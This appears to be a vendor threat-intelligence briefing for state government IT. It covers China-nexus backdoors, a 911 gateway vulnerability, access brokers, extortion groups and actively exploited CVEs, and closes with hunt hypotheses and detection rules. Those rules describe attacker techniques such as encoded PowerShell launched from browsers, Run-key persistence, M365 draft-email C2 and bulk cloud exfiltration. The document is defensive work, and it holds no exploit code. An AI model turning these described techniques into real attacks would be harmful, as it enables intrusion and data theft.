When 911 Goes Dark: China-Nexus Backdoors, Access Brokers Selling Government Networks, and a Wake-Up Call for State IT Leaders
<p><strong>Threat Assessment Level: ELEVATED</strong><em>Unchanged from the prior assessment period. The convergence of nation-state espionage tooling linked to China-nexus operations, actively exploited critical vulnerabilities in government-used platforms, and access brokers explicitly selling state and local government network access sustains this elevated posture.</em></p>
<h2><strong>Executive Summary </strong></h2>
<p>State government networks are under coordinated pressure from multiple directions this week. On April 23, CISA took the unusual step of publishing a malware analysis report for a newly identified backdoor called <strong>FIRESTARTER</strong> on the same day it released a joint Five Eyes advisory on China-nexus compromise of network devices — a pattern that historically signals a coordinated government response to an active espionage campaign. Separately, a vulnerability in <strong>Intrado 911 Emergency Gateway</strong> systems — the infrastructure that routes 911 calls — now has a CISA advisory warning that attackers can read, modify, or delete files on these life-safety systems. And an access broker known as <strong>HOOK SPIDER</strong>, whose client list reads like a who’s-who of ransomware operators, updated its profile this week with explicit targeting of government and local government entities across 66 countries, including the United States.</p>
<p>This is not theoretical. These are concurrent, active threats to the systems state agencies depend on every day.</p>
<h2><strong>What Changed </strong></h2>
<table> <thead> <tr> <th> <p>Date</p> </th> <th> <p>Development</p> </th> <th> <p>Why It Matters for State Government</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>7 Apr 2026</strong></p> </td> <td> <p>Researcher “Chaotic Eclipse” releases PoC for <strong>CVE-2026-33825</strong> (BlueHammer) — Microsoft Defender privilege escalation</p> </td> <td> <p>Lowers the barrier for exploitation of a tool deployed on virtually every state Windows endpoint</p> </td> </tr> <tr> <td> <p><strong>16 Apr 2026</strong></p> </td> <td> <p>Huntress Labs confirms BlueHammer exploited in the wild</p> </td> <td> <p>Moves from theoretical to confirmed threat; <strong>CISA KEV mandatory remediation deadline: 7 May 2026</strong></p> </td> </tr> <tr> <td> <p><strong>20 Apr 2026</strong></p> </td> <td> <p>ClickFix → <strong>NETSUPPORT</strong> RAT campaign updated, explicitly targeting government</p> </td> <td> <p>Social engineering technique tricks users into pasting malicious PowerShell — bypasses email security</p> </td> </tr> <tr> <td> <p><strong>22–23 Apr 2026</strong></p> </td> <td> <p>CISA adds two new KEV entries in 48 hours</p> </td> <td> <p>Signals elevated exploitation activity across the vulnerability landscape</p> </td> </tr> <tr> <td> <p><strong>23 Apr 2026</strong></p> </td> <td> <p>CISA publishes <strong>FIRESTARTER</strong> backdoor MAR (AR26-113A) alongside China-nexus advisory (AA26-113A)</p> </td> <td> <p>Sequential report numbering and same-day publication suggest linked investigation into government-targeting espionage</p> </td> </tr> <tr> <td> <p><strong>23 Apr 2026</strong></p> </td> <td> <p>ESET discloses <strong>GopherWhisper</strong> — China-aligned APT using M365 Graph API draft-email dead-drops for C2</p> </td> <td> <p>Abuses the same Microsoft 365 environment state agencies rely on for daily operations</p> </td> </tr> <tr> <td> <p><strong>23 Apr 2026</strong></p> </td> <td> <p>CISA/Five Eyes joint advisory <strong>AA26-113a</strong> on China-nexus compromised SOHO routers and edge devices</p> </td> <td> <p>State agency branch offices and remote sites often use exactly these device types</p> </td> </tr> <tr> <td> <p><strong>23 Apr 2026</strong></p> </td> <td> <p>Iranian espionage campaign updated — custom backdoors + legitimate RATs targeting government across 17 countries</p> </td> <td> <p>Expands the nation-state threat beyond China-nexus to include Iran-nexus actors</p> </td> </tr> <tr> <td> <p><strong>23 Apr 2026</strong></p> </td> <td> <p>CISA ICS advisory for <strong>Intrado 911 Emergency Gateway</strong> file manipulation vulnerability</p> </td> <td> <p>Direct threat to state-operated or state-overseen 911 dispatch infrastructure</p> </td> </tr> <tr> <td> <p><strong>23 Apr 2026</strong></p> </td> <td> <p><strong>CoinbaseCartel</strong> posts new government victim — exfiltration-only, no encryption</p> </td> <td> <p>Data theft without ransomware means no obvious alert fires; stolen PII has high criminal market value</p> </td> </tr> <tr> <td> <p><strong>24 Apr 2026</strong></p> </td> <td> <p><strong>HOOK SPIDER</strong> access broker profile updated — sells gov/local-gov network access to ransomware affiliates</p> </td> <td> <p>A HOOK SPIDER sale today becomes a ransomware incident in 2–14 days</p> </td> </tr> </tbody>
</table>
<h2><strong>Threat Timeline </strong></h2>
<table> <thead> <tr> <th> <p>Timeframe</p> </th> <th> <p>Event</p> </th> <th> <p>Threat Category</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>7 Apr</strong></p> </td> <td> <p>BlueHammer PoC released (CVE-2026-33825)</p> </td> <td> <p>Vulnerability / Privilege Escalation</p> </td> </tr> <tr> <td> <p><strong>16 Apr</strong></p> </td> <td> <p>BlueHammer confirmed exploited in the wild</p> </td> <td> <p>Active Exploitation</p> </td> </tr> <tr> <td> <p><strong>20 Apr</strong></p> </td> <td> <p>ClickFix → NETSUPPORT campaign targets government</p> </td> <td> <p>Social Engineering / RAT Delivery</p> </td> </tr> <tr> <td> <p><strong>22 Apr</strong></p> </td> <td> <p>CISA KEV addition #1</p> </td> <td> <p>Active Exploitation</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>CISA KEV addition #2</p> </td> <td> <p>Active Exploitation</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>FIRESTARTER MAR (AR26-113A) published</p> </td> <td> <p>Nation-State Espionage (China-nexus)</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>AA26-113a: China-nexus compromised device networks</p> </td> <td> <p>Nation-State Infrastructure Compromise</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>GopherWhisper M365 C2 disclosed</p> </td> <td> <p>Nation-State Espionage (China-nexus)</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>Iranian espionage campaign updated — 17 countries</p> </td> <td> <p>Nation-State Espionage (Iran-nexus)</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>Intrado 911 EGW advisory (ICSA-26-113-06)</p> </td> <td> <p>Critical Infrastructure Vulnerability</p> </td> </tr> <tr> <td> <p><strong>23 Apr</strong></p> </td> <td> <p>CoinbaseCartel posts new government victim</p> </td> <td> <p>Data Extortion</p> </td> </tr> <tr> <td> <p><strong>24 Apr</strong></p> </td> <td> <p>HOOK SPIDER profile updated — gov targeting confirmed</p> </td> <td> <p>Access Brokering / Ransomware Enablement</p> </td> </tr> <tr> <td> <p><strong>7 May</strong></p> </td> <td> <p><strong>CISA KEV deadline: BlueHammer (CVE-2026-33825)</strong></p> </td> <td> <p>Compliance Deadline</p> </td> </tr> </tbody>
</table>
<h2><strong>Key Threat Analysis </strong></h2>
<h3><strong>1. FIRESTARTER and the China-Nexus Espionage Convergence</strong></h3>
<p>CISA’s simultaneous publication of the <strong>FIRESTARTER</strong> backdoor malware analysis report (AR26-113A) and the China-nexus compromised device advisory (AA26-113A) is the most significant signal this week. The sequential report numbering — AR26-113<strong>A</strong> and AA26-113<strong>A</strong> — strongly suggests these are products of the same investigation.</p>
<p>If FIRESTARTER is the backdoor deployed through the compromised SOHO router and edge device infrastructure described in AA26-113A, the implications for state government are severe. State agencies operate hundreds of branch offices, field locations, and remote sites that commonly use exactly the types of small office routers and network appliances called out in the advisory. These devices are often managed by local staff or MSPs with limited security visibility.</p>
<p>This sits alongside two other active China-nexus operations:</p>
<ul> <li><strong>GopherWhisper</strong> — A newly disclosed APT that abuses Microsoft 365 Graph API draft-email folders as dead-drop C2 channels, with Slack and Discord as backup communication paths. For any state agency running M365 (which is nearly all of them), this means the adversary’s command-and-control traffic looks like normal productivity suite API calls.</li> <li><strong>Volt Typhoon</strong> — The ongoing campaign targeting critical infrastructure through compromised network devices, tracked continuously since prior reporting periods.</li>
</ul>
<p><strong>Bottom line:</strong> China-nexus actors are running multiple parallel operations that target the exact technology stack most state governments depend on — M365 for productivity, SOHO routers at branch offices, and edge network devices at agency perimeters.</p>
<h3><strong>2. Intrado 911 Emergency Gateway — A Life-Safety Vulnerability</strong></h3>
<p>CISA advisory <strong>ICSA-26-113-06</strong> discloses a vulnerability in the <strong>Intrado 911 Emergency Gateway (EGW)</strong> — the system Public Safety Answering Points (PSAPs) use to route 911 calls. Successful exploitation allows an attacker to <strong>read, modify, or delete files</strong> on the system.</p>
<p>This is not a typical IT vulnerability. This is a life-safety system. File manipulation on a 911 gateway could disrupt call routing during an emergency, redirect calls, or corrupt dispatch data. States operate or oversee 911 infrastructure, and this system may not appear in standard IT asset inventories because it is managed by public safety agencies or third-party 911 service providers.</p>
<p>This is the first CISA advisory specifically targeting 911 dispatch infrastructure in the current tracking period, making it a novel and high-priority finding.</p>
<h3><strong>3. HOOK SPIDER: The Access Broker Selling Your Network to Ransomware Gangs</strong></h3>
<p><strong>HOOK SPIDER</strong> (also known as Pirat-Networks, BenjaminFranklin, Big-Bro, and crasty_bro) is an access broker — a criminal actor who compromises networks and then sells that access to ransomware operators. Their profile was updated on April 24 with confirmed targeting of <strong>government and local government</strong> across 66 countries including the United States.</p>
<p>What makes HOOK SPIDER a force multiplier is their client list. They sell access to:</p>
<ul> <li><strong>SCATTERED SPIDER</strong> — Known for sophisticated social engineering and SIM-swapping</li> <li><strong>VICE SPIDER</strong> — Ransomware affiliate</li> <li><strong>ALPHA SPIDER</strong> (BlackCat/ALPHV successor operations)</li> <li><strong>WANDERING SPIDER</strong></li> <li><strong>Nova RaaS</strong> operators</li>
</ul>
<p>HOOK SPIDER uses commodity info-stealers (<strong>RedLine</strong>, <strong>Vidar</strong>) and the <strong>ProxyShell</strong> exploit chain to gain initial access. A single successful HOOK SPIDER compromise of a state agency network could be handed off to any of these ransomware operators within days.</p>
<p>The active ransomware landscape reinforces this concern:</p>
<ul> <li><strong>DragonForce</strong> — 492 confirmed victims, updated April 22</li> <li><strong>CoinbaseCartel</strong> — 164 victims, new victim posted April 23, including a government ministry</li> <li><strong>Everest, Qilin, Lynx, Termite, Nightspire, SafePay, IncRansom</strong> — All active and tracked</li>
</ul>
<h3><strong>4. CoinbaseCartel: Data Theft Without the Ransomware Alert</strong></h3>
<p><strong>CoinbaseCartel</strong> represents an evolution in the extortion model that is particularly dangerous for government. They explicitly state they “never involve system encryption or operational disruption.” Instead, they steal data and extort victims with the threat of publication.</p>
<p>Their TTPs include: - Abuse of <strong>valid cloud accounts</strong> (T1078.004) - <strong>Vishing</strong> (voice phishing) for initial access (T1566.004) - Exfiltration to cloud storage services</p>
<p>For state agencies holding driver’s license records, tax data, Medicaid information, and voter rolls, this model is insidious: <strong>there is no ransomware detonation to trigger an alert.</strong> Detection depends entirely on data loss prevention (DLP) controls and user/entity behavior analytics (UEBA) — capabilities that many state agencies have not fully deployed.</p>
<h3><strong>5. Iranian Espionage Campaign Expands</strong></h3>
<p>An active Iranian-nexus espionage campaign was updated on April 23, targeting <strong>government, education, energy, telecommunications, utilities, and non-profit</strong> sectors across 17 countries. The actors deploy custom backdoors alongside legitimate remote access tools — a hallmark of <strong>MuddyWater</strong> (also known as Seedworm, assessed as Iranian MOIS-affiliated) and <strong>APT34</strong> tradecraft.</p>
<p>While no U.S. state government victims have been confirmed in this campaign, the targeting profile aligns closely with state agency verticals (government, education, energy, utilities). <strong>MuddyWater</strong> is assessed with moderate probability to target U.S. state networks within the next 14 days.</p>
<h3><strong>6. ClickFix Social Engineering Targets Government Users</strong></h3>
<p>A financially motivated campaign is using the <strong>ClickFix</strong> technique to deploy <strong>NETSUPPORT</strong> RAT against government targets. ClickFix tricks users into copying and pasting malicious PowerShell commands — often disguised as browser error “fixes.” Because the user manually executes the command, this technique <strong>bypasses email security gateways and many endpoint protections</strong> that focus on file-based delivery.</p>
<h3><strong>7. Critical Vulnerabilities Requiring Immediate Attention</strong></h3>
<table> <thead> <tr> <th> <p>CVE</p> </th> <th> <p>Product</p> </th> <th> <p>CVSS</p> </th> <th> <p>Status</p> </th> </tr> </thead> <tbody> <tr> <td> <p><strong>CVE-2026-33825</strong> (BlueHammer)</p> </td> <td> <p>Microsoft Defender</p> </td> <td> <p>—</p> </td> <td> <p>Exploited in the wild; <strong>KEV deadline 7 May 2026</strong></p> </td> </tr> <tr> <td> <p><strong>CVE-2026-1340</strong></p> </td> <td> <p>Ivanti Endpoint Manager Mobile (EPMM)</p> </td> <td> <p>9.8</p> </td> <td> <p>Actively exploited per campaign data</p> </td> </tr> <tr> <td> <p><strong>CVE-2026-1281</strong></p> </td> <td> <p>Ivanti Endpoint Manager Mobile (EPMM)</p> </td> <td> <p>9.8</p> </td> <td> <p>Actively exploited per campaign data</p> </td> </tr> <tr> <td> <p><strong>CVE-2026-1731</strong></p> </td> <td> <p>BeyondTrust Remote Support / Privileged Remote Access</p> </td> <td> <p>9.8</p> </td> <td> <p>Active exploitation campaign confirmed; reconnaissance activity observed (GreyNoise)</p> </td> </tr> </tbody>
</table>
<p>All four vulnerabilities affect products commonly deployed in state government environments. The two Ivanti EPMM vulnerabilities are particularly concerning for agencies using Ivanti for mobile device management, and the BeyondTrust vulnerability directly impacts privileged access management — the keys to the kingdom.</p>
<h2><strong>Predictive Analysis </strong></h2>
<p>Based on current threat actor operational tempo, vulnerability exploitation patterns, and targeting data:</p>
<table> <thead> <tr> <th> <p>Scenario</p> </th> <th> <p>Probability</p> </th> <th> <p>Timeframe</p> </th> <th> <p>Basis</p> </th> </tr> </thead> <tbody> <tr> <td> <p>CISA publishes follow-up linking FIRESTARTER to a specific China-nexus actor group with additional IOCs</p> </td> <td> <p><strong>70%</strong></p> </td> <td> <p>7 days</p> </td> <td> <p>Same-day publication pattern with sequential numbering historically precedes attribution</p> </td> </tr> <tr> <td> <p>Additional CISA KEV entries added</p> </td> <td> <p><strong>60%</strong></p> </td> <td> <p>7 days</p> </td> <td> <p>Two additions in 48 hours indicates elevated exploitation discovery rate</p> </td> </tr> <tr> <td> <p>DragonForce or CoinbaseCartel posts a U.S. government entity as a victim</p> </td> <td> <p><strong>50%</strong></p> </td> <td> <p>7 days</p> </td> <td> <p>Combined 656 victims, both updated within 48 hours, both target government</p> </td> </tr> <tr> <td> <p>MuddyWater/Iranian-nexus actors target a U.S. state government network</p> </td> <td> <p><strong>40%</strong></p> </td> <td> <p>14 days</p> </td> <td> <p>Campaign updated with government targeting across 17 countries; U.S. state agencies match victim profile</p> </td> </tr> <tr> <td> <p>HOOK SPIDER access sale leads to ransomware incident at a state/local government entity</p> </td> <td> <p><strong>35%</strong></p> </td> <td> <p>14 days</p> </td> <td> <p>Confirmed gov/local-gov targeting + confirmed relationships with active ransomware operators</p> </td> </tr> <tr> <td> <p>APT29 reconnaissance against state election infrastructure ahead of 2026 midterms</p> </td> <td> <p><strong>30%</strong></p> </td> <td> <p>30 days</p> </td> <td> <p>Historical pattern of APT29 pivoting to state targets during election cycles; absence of current activity is not assurance</p> </td> </tr> </tbody>
</table>
<h2><strong>SOC Operational Guidance </strong></h2>
<h3><strong>Hunt Hypotheses</strong></h3>
<p><strong>Hunt 1: FIRESTARTER Backdoor Activity</strong> - <strong>Hypothesis:</strong> China-nexus actors have deployed FIRESTARTER on state network endpoints via compromised edge devices. - <strong>What to look for:</strong> Unusual outbound connections from endpoints to infrastructure identified in CISA MAR AR26-113A (download full IOC set from CISA); unexpected scheduled tasks or services on systems adjacent to SOHO routers or VPN concentrators. - <strong>ATT&CK techniques:</strong> T1059 (Command and Scripting Interpreter), T1071 (Application Layer Protocol), T1105 (Ingress Tool Transfer), T1082 (System Information Discovery), T1041 (Exfiltration Over C2 Channel) - <strong>Data sources:</strong> EDR telemetry, firewall logs, DNS query logs, proxy logs</p>
<p><strong>Hunt 2: GopherWhisper M365 Graph API Abuse</strong> - <strong>Hypothesis:</strong> An adversary is using M365 Graph API calls to draft-email folders as a covert C2 channel. - <strong>What to look for:</strong> Anomalous Graph API calls to /me/messages or /me/mailFolders/Drafts/messages endpoints from non-standard user agents or service principals; draft emails created and deleted in rapid succession; Slack/Discord webhook traffic from server endpoints. - <strong>ATT&CK techniques:</strong> T1071.003 (Mail Protocols), T1102 (Web Service), T1567 (Exfiltration Over Web Service) - <strong>Data sources:</strong> Microsoft 365 Unified Audit Log, Azure AD sign-in logs, Cloud App Security alerts</p>
<p><strong>Hunt 3: ClickFix PowerShell Execution</strong> - <strong>Hypothesis:</strong> Users are being socially engineered into pasting malicious PowerShell commands from browser prompts. - <strong>What to look for:</strong>powershell.exe with -encodedcommand or -e flags spawned within seconds of browser process focus change; PowerShell downloading and executing NETSUPPORT RAT components; new entries in HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing to NETSUPPORT binaries. - <strong>ATT&CK techniques:</strong> T1204.002 (User Execution: Malicious File), T1059.001 (PowerShell), T1219 (Remote Access Software), T1547.001 (Registry Run Keys) - <strong>Data sources:</strong> EDR process creation logs, PowerShell script block logging (Event ID 4104), registry monitoring</p>
<p><strong>Hunt 4: CoinbaseCartel Cloud Exfiltration</strong> - <strong>Hypothesis:</strong> An adversary has compromised cloud accounts and is exfiltrating sensitive data to external cloud storage without deploying ransomware. - <strong>What to look for:</strong> Unusual volume of file downloads from SharePoint/OneDrive by a single account; OAuth token grants to unfamiliar applications; large data transfers to consumer cloud storage (Google Drive, Mega, Dropbox) from state network egress points; vishing attempts reported to helpdesk preceding account compromise. - <strong>ATT&CK techniques:</strong> T1078.004 (Valid Accounts: Cloud Accounts), T1566.004 (Phishing: Voice), T1567 (Exfiltration Over Web Service) - <strong>Data sources:</strong> CASB logs, DLP alerts, Azure AD sign-in anomalies, helpdesk ticket correlation</p>
<p><strong>Hunt 5: HOOK SPIDER Initial Access Indicators</strong> - <strong>Hypothesis:</strong> HOOK SPIDER has compromised or is attempting to compromise state agency infrastructure using info-stealers and ProxyShell. - <strong>What to look for:</strong> RedLine or Vidar stealer artifacts on endpoints (check for known file paths and registry keys); ProxyShell exploitation attempts against Exchange servers (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207); credentials for state agency systems appearing on dark web marketplaces or paste sites. - <strong>ATT&CK techniques:</strong> T1589.001 (Gather Victim Identity: Credentials), T1078 (Valid Accounts), T1190 (Exploit Public-Facing Application), T1555 (Credentials from Password Stores) - <strong>Data sources:</strong> EDR alerts, Exchange server logs, dark web monitoring feeds, credential leak monitoring</p>
<h3><strong>Detection Rules to Prioritize</strong></h3>
<table> <thead> <tr> <th> <p>Priority</p> </th> <th> <p>Detection</p> </th> <th> <p>ATT&CK ID</p> </th> <th> <p>Platform</p> </th> </tr> </thead> <tbody> <tr> <td> <p>HIGH</p> </td> <td> <p>PowerShell encoded command execution from browser child process</p> </td> <td> <p>T1059.001</p> </td> <td> <p>EDR / Sysmon</p> </td> </tr> <tr> <td> <p>HIGH</p> </td> <td> <p>M365 Graph API draft-email rapid create/delete pattern</p> </td> <td> <p>T1071.003</p> </td> <td> <p>M365 UAL / CASB</p> </td> </tr> <tr> <td> <p>HIGH</p> </td> <td> <p>BeyondTrust RS/PRA exploitation attempts (CVE-2026-1731)</p> </td> <td> <p>T1190</p> </td> <td> <p>WAF / IDS</p> </td> </tr> <tr> <td> <p>HIGH</p> </td> <td> <p>Ivanti EPMM unauthenticated API access (CVE-2026-1340, CVE-2026-1281)</p> </td> <td> <p>T1190</p> </td> <td> <p>MDM logs / WAF</p> </td> </tr> <tr> <td> <p>MEDIUM</p> </td> <td> <p>OAuth device-code flow from unexpected geolocation</p> </td> <td> <p>T1078</p> </td> <td> <p>Azure AD Conditional Access</p> </td> </tr> <tr> <td> <p>MEDIUM</p> </td> <td> <p>Large-volume SharePoint/OneDrive download by single identity</p> </td> <td> <p>T1567</p> </td> <td> <p>CASB / DLP</p> </td> </tr> <tr> <td> <p>MEDIUM</p> </td> <td> <p>New scheduled task or service creation on systems near network edge</p> </td> <td> <p>T1053 / T1543</p> </td> <td> <p>EDR / Sysmon</p> </td> </tr> </tbody>
</table>
<h2><strong>Sector-Specific Defensive Priorities</strong></h2>
<h3><strong>Financial Services (State Treasury, Revenue, Tax Agencies)</strong></h3>
<ul> <li><strong>Primary threat:</strong> CoinbaseCartel’s exfiltration-only model targeting financial data via cloud account compromise and vishing. Tax records and revenue data are high-value targets.</li> <li><strong>Action:</strong> Enforce conditional access policies requiring compliant devices for all cloud access to financial systems. Deploy DLP rules specifically monitoring for bulk export of taxpayer PII. Brief helpdesk staff on vishing scenarios where callers impersonate IT support to obtain MFA codes.</li> <li><strong>Key CVE:</strong> CVE-2026-1731 (BeyondTrust) — revenue agencies using BeyondTrust for vendor remote support must patch immediately.</li>
</ul>
<h3><strong>Energy (State Energy Offices, Utility Oversight, Dam Safety)</strong></h3>
<ul> <li><strong>Primary threat:</strong> Iranian espionage campaign explicitly targeting energy and utilities sectors; China-nexus compromised edge devices at remote energy monitoring sites.</li> <li><strong>Action:</strong> Audit all SOHO routers and edge devices at remote energy monitoring locations against the CISA AA26-113a device list. Verify segmentation between IT and OT/SCADA networks. Review remote access pathways used by third-party energy contractors.</li> <li><strong>Key ATT&CK:</strong> T1071 (Application Layer Protocol) — monitor for unusual outbound traffic from OT-adjacent network segments.</li>
</ul>
<h3><strong>Healthcare (Medicaid, State Health Departments, Public Health Labs)</strong></h3>
<ul> <li><strong>Primary threat:</strong> Ransomware via HOOK SPIDER access brokering — healthcare data commands premium prices on criminal markets. Ivanti EPMM vulnerabilities affect mobile devices used by field health workers.</li> <li><strong>Action:</strong> Patch Ivanti EPMM immediately (CVE-2026-1340, CVE-2026-1281, both CVSS 9.8). Review mobile device enrollment policies — unauthenticated API access to MDM platforms could allow adversary device enrollment. Ensure Medicaid PII databases have row-level access logging enabled.</li> <li><strong>Key CVE:</strong> CVE-2026-1340 and CVE-2026-1281 (Ivanti EPMM) — critical for any agency managing mobile health worker devices.</li>
</ul>
<h3><strong>Government (All State Agencies, Courts, Legislature)</strong></h3>
<ul> <li><strong>Primary threat:</strong> Multi-vector — FIRESTARTER espionage backdoor, ClickFix social engineering delivering NETSUPPORT RAT, HOOK SPIDER selling government network access, and GopherWhisper abusing M365 for C2.</li> <li><strong>Action:</strong> Prioritize BlueHammer (CVE-2026-33825) patching ahead of the May 7 KEV deadline — Microsoft Defender is deployed on virtually every state endpoint. Implement PowerShell Constrained Language Mode on standard user workstations to mitigate ClickFix attacks. Audit Azure AD for OAuth applications with excessive permissions (Graph API mail read/write scopes granted to unknown apps).</li> <li><strong>Key deadline:</strong><strong>7 May 2026 — CISA KEV mandatory remediation for BlueHammer.</strong></li>
</ul>
<h3><strong>Aviation / Logistics (State DOT, Airports, Port Authorities)</strong></h3>
<ul> <li><strong>Primary threat:</strong> China-nexus compromised network devices at transportation management centers and remote DOT facilities; supply chain compromise via MSPs managing traffic management and logistics systems.</li> <li><strong>Action:</strong> Inventory all network edge devices at traffic management centers, weigh stations, and remote DOT sites against CISA AA26-113a advisory. Review MSP access controls — ensure MSP VPN accounts use MFA and are scoped to minimum necessary access. Monitor for anomalous data flows from transportation SCADA systems.</li> <li><strong>Key ATT&CK:</strong> T1199 (Trusted Relationship) — MSP compromise is the primary initial access vector for transportation infrastructure.</li>
</ul>
<h2><strong>Prioritized Defense Recommendations</strong></h2>
<h3><strong>🔴 IMMEDIATE (Within 24 Hours)</strong></h3>
<ol> <li><strong>IT Ops + 911 Authority:</strong> Contact the state’s 911/PSAP authority and verify patch status for <strong>Intrado 911 Emergency Gateway</strong> systems per CISA advisory ICSA-26-113-06. This is a life-safety system — CIO-level communication to the relevant public safety agency is warranted today.</li> <li><strong>SOC:</strong> Download the full CISA <strong>FIRESTARTER</strong> Malware Analysis Report (AR26-113A) from cisa.gov. Extract all IOCs (hashes, IPs, domains) and ingest into SIEM and EDR platforms for retroactive hunting across all state network endpoints.</li> <li><strong>SOC:</strong> Verify compliance with both CISA KEV additions from April 22–23. Confirm patches are deployed or mitigations are in place within BOD 22-01 timelines.</li> <li><strong>IT Ops:</strong> Confirm <strong>BlueHammer (CVE-2026-33825)</strong> patch deployment status across all state endpoints. The CISA KEV mandatory remediation deadline is <strong>May 7, 2026</strong> — with confirmed in-the-wild exploitation since April 16, this cannot wait.</li>
</ol>
<h3><strong>🟡 7-DAY</strong></h3>
<ol> <li><strong>IAM / Identity Team:</strong> Audit Azure AD conditional access policies to restrict or block <strong>device-code authentication flows</strong>. Block legacy authentication protocols that enable OAuth device-code phishing. Review all OAuth application grants for excessive Graph API permissions (especially Mail.ReadWrite, Files.ReadWrite.All).</li> <li><strong>SOC / Detection Engineering:</strong> Deploy detection for <strong>ClickFix-style attacks</strong> — alert on powershell.exe with -encodedcommand spawned within 5 seconds of browser process focus loss. Enable PowerShell Script Block Logging (Event ID 4104) on all endpoints if not already active.</li> <li><strong>Security Architecture:</strong> Review DLP policies for <strong>cloud storage exfiltration</strong> (OneDrive, Google Drive, Mega, Dropbox). CoinbaseCartel’s exfiltration-only model means no ransomware detonation alert will fire — detection depends entirely on DLP and UEBA. Ensure CASB is monitoring for bulk file downloads.</li> <li><strong>IT Ops:</strong> Patch <strong>Ivanti EPMM</strong> (CVE-2026-1340 and CVE-2026-1281, both CVSS 9.8) and <strong>BeyondTrust Remote Support/PRA</strong> (CVE-2026-1731, CVSS 9.8). Both have active exploitation campaigns confirmed.</li> <li><strong>Network Security:</strong> Audit all SOHO routers and edge network devices at agency branch offices and remote sites against the device types listed in <strong>CISA/Five Eyes advisory AA26-113a</strong>. Replace or isolate compromised device models.</li>
</ol>
<h3><strong>🔵 30-DAY</strong></h3>
<ol> <li><strong>CISO:</strong> Commission a security assessment of state <strong>911/PSAP infrastructure</strong> including Intrado EGW, Computer-Aided Dispatch (CAD) systems, and NG911 components. Coordinate with state emergency management. This infrastructure may not appear in standard IT asset inventories.</li> <li><strong>CISO:</strong> Initiate a proactive threat hunt for <strong>APT29</strong> indicators against state election infrastructure ahead of the 2026 midterm cycle. Coordinate with the Election Assistance Commission (EAC) and CISA Election Security. The current absence of APT29 activity against state targets should not be interpreted as safety.</li> <li><strong>CISO / IR Team:</strong> Conduct a tabletop exercise simulating a <strong>HOOK SPIDER access sale → ransomware deployment</strong> scenario against a state agency. Test incident response procedures, backup restoration timelines, and communication plans. HOOK SPIDER’s confirmed relationships with SCATTERED SPIDER, Nova RaaS, and other ransomware operators make this a realistic near-term scenario.</li> <li><strong>Security Architecture:</strong> Implement <strong>PowerShell Constrained Language Mode</strong> on standard user workstations across all agencies to reduce the effectiveness of ClickFix and similar social engineering techniques that rely on user-executed PowerShell.</li> <li><strong>CISO / Governance:</strong> Establish a weekly manual review of <strong>NASCIO, NCSL Cybersecurity Legislation Tracker, and congress.gov</strong> for state-relevant cybersecurity legislation and federal cyber funding developments. Automated feeds have not reliably captured legislative intelligence — this requires a human-in-the-loop process.</li>
</ol>
<h2><strong>Bottom Line </strong></h2>
<p>State government IT faces a convergence of threats this week that is broader and more technically sophisticated than any single advisory conveys. China-nexus actors are running simultaneous espionage operations through compromised edge devices, M365 API abuse, and a newly disclosed backdoor — all targeting the exact technology stack state agencies depend on. Iranian actors are expanding government targeting globally. Access brokers are explicitly advertising state and local government network access to ransomware operators. A vulnerability in 911 dispatch infrastructure introduces a life-safety dimension that demands immediate executive attention.</p>
<p>Every threat in this report has a concrete defensive action available today. The BlueHammer patch deadline is May 7. The Ivanti and BeyondTrust patches are available now. The FIRESTARTER IOCs can be hunted today. The 911 authority can be called this morning. State agencies are being targeted — the question is whether the patches get deployed, the hunts get run, and the calls get made before the next advisory is about your network.</p>
<h2><strong>Closing </strong></h2>
<p>The threat landscape facing state government IT this week is defined by convergence. China-nexus actors are running parallel espionage operations through compromised edge devices, M365 API abuse, and newly disclosed backdoors — all targeting the exact technology stack state agencies depend on. Iranian actors are expanding government targeting globally. Access brokers are explicitly advertising state and local government network access to ransomware operators. And a vulnerability in 911 dispatch infrastructure introduces a life-safety dimension that demands immediate executive attention.</p>
<p>The common thread across all of these threats is that they exploit the gaps state governments know they have: legacy edge devices at remote offices, under-monitored cloud environments, mobile device management platforms that haven’t been patched, and critical infrastructure systems that don’t appear in IT asset inventories.</p>
<p>The good news is that every threat identified in this report has a concrete defensive action. The BlueHammer patch deadline is May 7. The Ivanti and BeyondTrust patches are available now. The FIRESTARTER IOCs can be hunted today. The 911 authority can be called this morning.</p>
<p>The question is not whether state agencies are being targeted. They are. The question is whether the patches get deployed, the hunts get run, and the calls get made before the next advisory is about your network.</p>
FEATURED RESOURCES
Anomali Cyber Watch
Public Sector
